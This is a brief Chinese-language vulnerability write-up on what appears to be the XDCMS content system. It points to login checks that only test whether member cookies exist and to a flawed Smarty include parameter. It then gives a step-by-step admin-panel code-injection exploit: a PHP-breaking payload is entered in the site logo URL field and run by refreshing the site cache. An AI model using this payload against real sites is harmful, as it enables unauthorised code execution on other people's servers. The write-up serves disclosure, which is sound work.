漏洞文件: System/modeules/member/login.php

if(empty($_COOKIE['member_user'])||empty($_COOKIE['member_userid'])) //只判断Cookie是否存在

漏洞文件:system/libs/base.class.php

if( empty($_COOKIE['member_user'])||  empty($_COOKIE['member_userid'])){  //只判断Cookie

Sysplugins\smarty_internal_compile_include.php

参数$include_file 存在问题 在.

 

后台2次利用执行代码

1.访问//index.php?m=xdcms&c=setting

2.在 网站LOGO地址:填写”');?><?php phpinfo()?> <?php $_config=array ( 'logourl' => '”

3.点击 后台首页-->>常用操作-->>更新全站缓存  刷新即可执行 刚才添加的php代码